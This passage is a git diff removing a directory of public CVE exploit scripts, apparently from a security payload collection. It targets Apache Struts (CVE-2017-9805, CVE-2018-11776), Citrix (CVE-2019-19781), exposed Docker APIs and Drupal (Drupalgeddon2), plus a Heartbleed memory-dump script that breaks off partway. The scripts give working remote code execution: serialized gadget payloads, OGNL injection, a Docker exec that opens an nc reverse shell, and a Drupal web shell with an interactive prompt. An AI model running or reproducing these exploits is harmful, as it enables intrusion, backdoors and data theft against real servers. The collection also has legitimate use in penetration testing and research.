help.' % (sys.argv[0])) - exit(0) - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')", - action='store', - default='echo test > /tmp/struts-pwn') -parser.add_argument("--exploit", - dest="do_exploit", - help="Exploit.", - action='store_true') -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -url = args.url if args.url else None -cmd = args.cmd if args.cmd else None -do_exploit = args.do_exploit if args.do_exploit else None - - -def url_prepare(url): - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - if ('://' not in url): - url = str('http') + str('://') + str(url) - return(url) - - -def exploit(url, cmd, dont_print_status_on_console=False): - url = url_prepare(url) - if dont_print_status_on_console is False: - print('\n[*] URL: %s' % (url)) - print('[*] CMD: %s' % (cmd)) - cmd = "".join(["{0}".format(_) for _ in cmd.split(" ")]) - - payload = """ - - - - 0 - - - - - - false - 0 - - - - - - {0} - - false - - - - - java.lang.ProcessBuilder - start - - - foo - - foo - - - - - - false - 0 - 0 - false - - false - - - - 0 - - - - - - - - - -""".format(cmd) - - headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Referer': str(url), - 'Content-Type': 'application/xml', - 'Accept': '*/*' - } - - timeout = 3 - try: - output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - output = 'ERROR' - return(output) - - -def check(url): - url = url_prepare(url) - print('\n[*] URL: %s' % (url)) - - initial_request = exploit(url, "", dont_print_status_on_console=True) - if initial_request == "ERROR": - result = False - print("The host does not respond as expected.") - return(result) - - payload_sleep_based_10seconds = """ - - - - 0 - - - - - - false - 0 - - - - - - - <__name>Pwnr - <__bytecodes> - yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu -dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA -EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD -bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5 -bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94 -c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy -aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs -YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv -eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u -cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t -L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu -L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7 -KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B -eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs -L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu -amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs -ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp -bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv -YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs -L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA -BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy -MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA -AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A -AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A -AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa -AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA -AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA -AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ - - yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu -dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA -EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy -aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2 -YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh -bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp -bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB -AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA -AAoAAQACABYAEAAJ - - <__transletIndex>-1 - <__indentNumber>0 - - false - - - - - - com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl - newTransformer - - - foo - - foo - - - - - - false - 0 - 0 - false - - false - - - - 0 - - - - - - - - - -""" - headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Referer': str(url), - 'Content-Type': 'application/xml', - 'Accept': '*/*' - } - - timeout = 8 - try: - requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - # if the response returned before the request timeout. - # then, the host should not be vulnerable. - # The request should return > 10 seconds, while the timeout is 8. - result = False - except Exception: - result = True - return(result) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): - if url: - if not do_exploit: - result = check(url) - output = '[*] Status: ' - if result is True: - output += 'Vulnerable!' - else: - output += 'Not Affected.' - print(output) - else: - exploit(url, cmd) - print("[$] Request sent.") - print("[.] If the host is vulnerable, the command will be executed in the background.") - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), 'r') - URLs_List = f_file.read().replace('\r', '').split('\n') - try: - URLs_List.remove('') - except ValueError: - pass - f_file.close() - except Exception as e: - print('Error: There was an error in reading list file.') - print("Exception: " + str(e)) - exit(1) - for url in URLs_List: - if not do_exploit: - result = check(url) - output = '[*] Status: ' - if result is True: - output += 'Vulnerable!' - else: - output += 'Not Affected.' - print(output) - else: - exploit(url, cmd) - print("[$] Request sent.") - print("[.] If the host is vulnerable, the command will be executed in the background.") - - print('[%] Done.') - -if __name__ == '__main__': - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) - except KeyboardInterrupt: - print('\nKeyboardInterrupt Detected.') - print('Exiting...') - exit(0) diff --git a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py b/CVE Exploits/Apache Struts 2 CVE-2018-11776.py deleted file mode 100644 index 7fb1174..0000000 --- a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py +++ /dev/null @@ -1,231 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2018-11776 Exploit -# Author: -# Mazin Ahmed -# This code uses a payload from: -# https://github.com/jas502n/St2-057 -# ***************************************************** - -from __future__ import print_function -from future import standard_library -standard_library.install_aliases() -from builtins import str -from builtins import range -import argparse -import random -import requests -import sys -try: - from urllib import parse as urlparse -except ImportError: - import urllib.parse - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except Exception: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2018-11776 - Apache Struts2 S2-057') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: 'id')", - action='store', - default='id') -parser.add_argument("--exploit", - dest="do_exploit", - help="Exploit.", - action='store_true') - - -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -cmd = args.cmd if args.cmd else None -do_exploit = args.do_exploit if args.do_exploit else None - -headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Accept': '*/*' -} -timeout = 3 - - -def parse_url(url): - """ - Parses the URL. - """ - - # url: http://example.com/demo/struts2-showcase/index.action - - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - - if ('://' not in url): - url = str("http://") + str(url) - scheme = urllib.parse.urlparse(url).scheme - - # Site: http://example.com - site = scheme + '://' + urllib.parse.urlparse(url).netloc - - # FilePath: /demo/struts2-showcase/index.action - file_path = urllib.parse.urlparse(url).path - if (file_path == ''): - file_path = '/' - - # Filename: index.action - try: - filename = url.split('/')[-1] - except IndexError: - filename = '' - - # File Dir: /demo/struts2-showcase/ - file_dir = file_path.rstrip(filename) - if (file_dir == ''): - file_dir = '/' - - return({"site": site, - "file_dir": file_dir, - "filename": filename}) - - -def build_injection_inputs(url): - """ - Builds injection inputs for the check. - """ - - parsed_url = parse_url(url) - injection_inputs = [] - url_directories = parsed_url["file_dir"].split("/") - - try: - url_directories.remove("") - except ValueError: - pass - - for i in range(len(url_directories)): - injection_entry = "/".join(url_directories[:i]) - - if not injection_entry.startswith("/"): - injection_entry = "/%s" % (injection_entry) - - if not injection_entry.endswith("/"): - injection_entry = "%s/" % (injection_entry) - - injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload. - injection_entry += parsed_url["filename"] - - injection_inputs.append(injection_entry) - - return(injection_inputs) - - -def check(url): - random_value = int(''.join(random.choice('0123456789') for i in range(2))) - multiplication_value = random_value * random_value - injection_points = build_injection_inputs(url) - parsed_url = parse_url(url) - print("[%] Checking for CVE-2018-11776") - print("[*] URL: %s" % (url)) - print("[*] Total of Attempts: (%s)" % (len(injection_points))) - attempts_counter = 0 - - for injection_point in injection_points: - attempts_counter += 1 - print("[%s/%s]" % (attempts_counter, len(injection_points))) - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value)) - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - continue - if "Location" in list(resp.headers.keys()): - if str(multiplication_value) in resp.headers['Location']: - print("[*] Status: Vulnerable!") - return(injection_point) - print("[*] Status: Not Affected.") - return(None) - - -def exploit(url, cmd): - parsed_url = parse_url(url) - - injection_point = check(url) - if injection_point is None: - print("[%] Target is not vulnerable.") - return(0) - print("[%] Exploiting...") - - payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd) - - testing_url = "%s%s" % (parsed_url["site"], injection_point) - testing_url = testing_url.replace("{{INJECTION_POINT}}", payload) - - try: - resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - return(1) - - print("[%] Response:") - print(resp.text) - return(0) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): - if url: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), "r") - URLs_List = f_file.read().replace("\r", "").split("\n") - try: - URLs_List.remove("") - except ValueError: - pass - f_file.close() - except Exception as e: - print("Error: There was an error in reading list file.") - print("Exception: " + str(e)) - exit(1) - for url in URLs_List: - if not do_exploit: - check(url) - else: - exploit(url, cmd) - - print("[%] Done.") - - -if __name__ == "__main__": - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) - except KeyboardInterrupt: - print("\nKeyboardInterrupt Detected.") - print("Exiting...") - exit(0) diff --git a/CVE Exploits/Citrix CVE-2019-19781.py b/CVE Exploits/Citrix CVE-2019-19781.py deleted file mode 100644 index a6d4044..0000000 --- a/CVE Exploits/Citrix CVE-2019-19781.py +++ /dev/null @@ -1,51 +0,0 @@ -#!/usr/bin/env python -# https://github.com/mpgn/CVE-2019-19781 -# # # - -import requests -import string -import random -import re -import sys -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - -print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway") -print("Found by Mikhail Klyuchnikov") -print("") - -if len(sys.argv) < 2: - print("[-] No URL provided") - sys.exit(0) - -while True: - try: - command = input("command > ") - - random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12)) - print("[+] Adding bookmark", random_xml + ".xml") - - burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl" - burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + - random_xml, "NSC_NONCE": "c", "Connection": "close"} - burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"} - r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False) - - if r.status_code == 200: - print("[+] Bookmark added") - else: - print("\n[-] Target not vulnerable or something went wrong") - sys.exit(0) - - burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml" - burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + - random_xml, "NSC_NONCE": "c", "Connection": "close"} - r = requests.get(burp0_url, headers=burp0_headers,verify=False) - - replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE) - print("[+] Result of the command: \n") - print(replaced) - - except KeyboardInterrupt: - print("Exiting...") - break \ No newline at end of file diff --git a/CVE Exploits/Docker API RCE.py b/CVE Exploits/Docker API RCE.py deleted file mode 100644 index 8880a16..0000000 --- a/CVE Exploits/Docker API RCE.py +++ /dev/null @@ -1,49 +0,0 @@ -from __future__ import print_function -import requests -import logging -import json -import urllib.parse - -# NOTE -# Enable Remote API with the following command -# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock -# This is an intended feature, remember to filter the port 2375.. - -name = "docker" -description = "Docker RCE via Open Docker API on port 2375" -author = "Swissky" - -# Step 1 - Extract id and name from each container -ip = "127.0.0.1" -port = "2375" -data = "containers/json" -url = "http://{}:{}/{}".format(ip, port, data) -r = requests.get(url) - -if r.json: - for container in r.json(): - container_id = container['Id'] - container_name = container['Names'][0].replace('/','') - print((container_id, container_name)) - - # Step 2 - Prepare command - cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]' - data = "containers/{}/exec".format(container_name) - url = "http://{}:{}/{}".format(ip, port, data) - post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }' - post_header = { - "Content-Type": "application/json" - } - r = requests.post(url, json=json.loads(post_json)) - - - # Step 3 - Execute command - id_cmd = r.json()['Id'] - data = "exec/{}/start".format(id_cmd) - url = "http://{}:{}/{}".format(ip, port, data) - post_json = '{ "Detach":false,"Tty":false}' - post_header = { - "Content-Type": "application/json" - } - r = requests.post(url, json=json.loads(post_json)) - print(r) \ No newline at end of file diff --git a/CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb b/CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb deleted file mode 100644 index d32a654..0000000 --- a/CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb +++ /dev/null @@ -1,308 +0,0 @@ -#!/usr/bin/env ruby -# -# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/ -# -# Authors: -# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked -# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k -# - - -require 'base64' -require 'json' -require 'net/http' -require 'openssl' -require 'readline' - - -# Settings - Proxy information (nil to disable) -proxy_addr = nil -proxy_port = 8080 - - -# Settings - General -$useragent = "drupalgeddon2" -webshell = "s.php" -writeshell = true - - -# Settings - Payload (we could just be happy without this, but we can do better!) -#bashcmd = "' -bashcmd = "&1' ); }" -bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d" - - -# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -# Function http_post [post] -def http_post(url, payload="") - uri = URI(url) - request = Net::HTTP::Post.new(uri.request_uri) - request.initialize_http_header({"User-Agent" => $useragent}) - request.body = payload - return $http.request(request) -end - - -# Function gen_evil_url -def gen_evil_url(evil, feedback=true) - # PHP function to use (don't forget about disabled functions...) - phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru" - - #puts "[*] PHP cmd: #{phpmethod}" if feedback - puts "[*] Payload: #{evil}" if feedback - - ## Check the version to match the payload - # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render - if $drupalverion.start_with?('8') - # Method #1 - Drupal 8, mail, #post_render - response is 200 - url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil - - # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!) - #url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - #payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil - elsif $drupalverion.start_with?('7') - # Method #3 - Drupal 7, name, #post_render - response is 200 - url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil - payload = "form_id=user_pass&_triggering_element_name=name" - else - puts "[!] Unsupported Drupal version" - exit - end - - # Drupal v7 needs an extra value from a form - if $drupalverion.start_with?('7') - response = http_post(url, payload) - - form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip - puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty? - - #url = $target + "file/ajax/name/%23value/" + form_build_id - url = $target + "?q=file/ajax/name/%23value/" + form_build_id - payload = "form_build_id=" + form_build_id - end - - return url, payload -end - - -# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -# Quick how to use -if ARGV.empty? - puts "Usage: ruby drupalggedon2.rb " - puts " ruby drupalgeddon2.rb https://example.com" - exit -end -# Read in values -$target = ARGV[0] - - -# Check input for protocol -if not $target.start_with?('http') - $target = "http://#{$target}" -end -# Check input for the end -if not $target.end_with?('/') - $target += "/" -end - - -# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -# Banner -puts "[*] --==[::#Drupalggedon2::]==--" -puts "-"*80 -puts "[*] Target : #{$target}" -puts "[*] Write? : Skipping writing web shell" if not writeshell -puts "-"*80 - - -# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -# Setup connection -uri = URI($target) -$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port) - - -# Use SSL/TLS if needed -if uri.scheme == "https" - $http.use_ssl = true - $http.verify_mode = OpenSSL::SSL::VERIFY_NONE -end - - -# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -# Try and get version -$drupalverion = nil -# Possible URLs -url = [ - $target + "CHANGELOG.txt", - $target + "core/CHANGELOG.txt", - $target + "includes/bootstrap.inc", - $target + "core/includes/bootstrap.inc", -] -# Check all -url.each do|uri| - # Check response - response = http_post(uri) - - if response.code == "200" - puts "[+] Found : #{uri} (#{response.code})" - - # Patched already? - puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002" - - # Try and get version from the file contents - $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip - - # If not, try and get it from the URL - $drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty? - - # Done! - break - elsif response.code == "403" - puts "[+] Found : #{uri} (#{response.code})" - - # Get version from URL - $drupalverion = uri.match(/core/)? "8.x" : "7.x" - else - puts "[!] MISSING: #{uri} (#{response.code})" - end -end - - -# Feedback -if $drupalverion - status = $drupalverion.end_with?('x')? "?" : "!" - puts "[+] Drupal#{status}: #{$drupalverion}" -else - puts "[!] Didn't detect Drupal version" - puts "[!] Forcing Drupal v8.x attack" - $drupalverion = "8.x" -end -puts "-"*80 - - - -# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -# Make a request, testing code execution -puts "[*] Testing: Code Execution" -# Generate a random string to see if we can echo it -random = (0...8).map { (65 + rand(26)).chr }.join -url, payload = gen_evil_url("echo #{random}") -response = http_post(url, payload) -if response.code == "200" and not response.body.empty? - #result = JSON.pretty_generate(JSON[response.body]) - result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body - puts "[+] Result : #{result}" - - puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?" -else - puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}" - exit -end -puts "-"*80 - - -# Location of web shell & used to signal if using PHP shell -webshellpath = nil -prompt = "drupalgeddon2" -# Possibles paths to try -paths = [ - "./", - "./sites/default/", - "./sites/default/files/", -] -# Check all -paths.each do|path| - puts "[*] Testing: File Write To Web Root (#{path})" - - # Merge locations - webshellpath = "#{path}#{webshell}" - - # Final command to execute - cmd = "#{bashcmd} | tee #{webshellpath}" - - # Generate evil URLs - url, payload = gen_evil_url(cmd) - # Make the request - response = http_post(url, payload) - # Check result - if response.code == "200" and not response.body.empty? - # Feedback - #result = JSON.pretty_generate(JSON[response.body]) - result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body - puts "[+] Result : #{result}" - - # Test to see if backdoor is there (if we managed to write it) - response = http_post("#{$target}#{webshellpath}", "c=hostname") - if response.code == "200" and not response.body.empty? - puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!" - break - else - puts "[!] Target is NOT exploitable. No write access here!" - end - else - puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}" - end - webshellpath = nil -end if writeshell -puts "-"*80 if writeshell - -if webshellpath - # Get hostname for the prompt - prompt = response.body.to_s.strip - - # Feedback - puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'" -elsif writeshell - puts "[!] FAILED: Coudn't find writeable web path" - puts "[*] Dropping back direct commands (expect an ugly shell!)" -end - - -# Stop any CTRL + C action ;) -trap("INT", "SIG_IGN") - - -# Forever loop -loop do - # Default value - result = "ERROR" - - # Get input - command = Readline.readline("#{prompt}>> ", true).to_s - - # Exit - break if command =~ /exit/ - - # Blank link? - next if command.empty? - - # If PHP shell - if webshellpath - # Send request - result = http_post("#{$target}#{webshell}", "c=#{command}").body - # Direct commands - else - url, payload = gen_evil_url(command, false) - response = http_post(url, payload) - if response.code == "200" and not response.body.empty? - result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body - end - end - - # Feedback - puts result -end diff --git a/CVE Exploits/Heartbleed CVE-2014-0160.py b/CVE Exploits/Heartbleed CVE-2014-0160.py deleted file mode 100644 index 42907c1..0000000 --- a/CVE Exploits/Heartbleed CVE-2014-0160.py +++ /dev/null @@ -1,216 +0,0 @@ -#!/usr/bin/python - -# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org) -# The author disclaims copyright to this source code. -# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin) - -from __future__ import print_function -from builtins import str -from builtins import range -import sys -import struct -import socket -import time -import select -import re -from optparse import OptionParser -import smtplib - -options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') -options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') -options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)') -options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)') -options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true') -options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)') - -def h2bin(x): - return x.replace(' ', '').replace('\n', '').decode('hex') - -hello = h2bin(''' -16 03 02 00 dc 01 00 00 d8 03 02 53 -43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf -bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 -00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 -00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c -c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 -c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 -c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c -c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 -00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 -03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 -00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 -00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 -00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 -00 0f 00 01 01 -''') - -hbv10 = h2bin(''' -18 03 01 00 03 -01 40 00 -''') - -hbv11 = h2bin(''' -18 03 02 00 03 -01 40 00 -''') - -hbv12 = h2bin(''' -18 03 03 00 03 -01 40 00 -''') - -def hexdump(s, dumpf, quiet): - dump = open(dumpf,'a') - dump.write(s) - dump.close() - if quiet: return - for b in range(0, len(s), 16): - lin = [c for c in s[b : b + 16]] - hxdat = ' '.join('%02X' % ord(c) for c in lin) - pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) - print(' %04x: %-48s %s' % (b, hxdat, pdat)) - print() - -def recvall(s, length, timeout=5): - endtime = time.time() + timeout - rdata = '' - remain = length - while remain > 0: - rtime = endtime - time.time() - if rtime < 0: - if not rdata: - return None - else: - return rdata - r, w, e 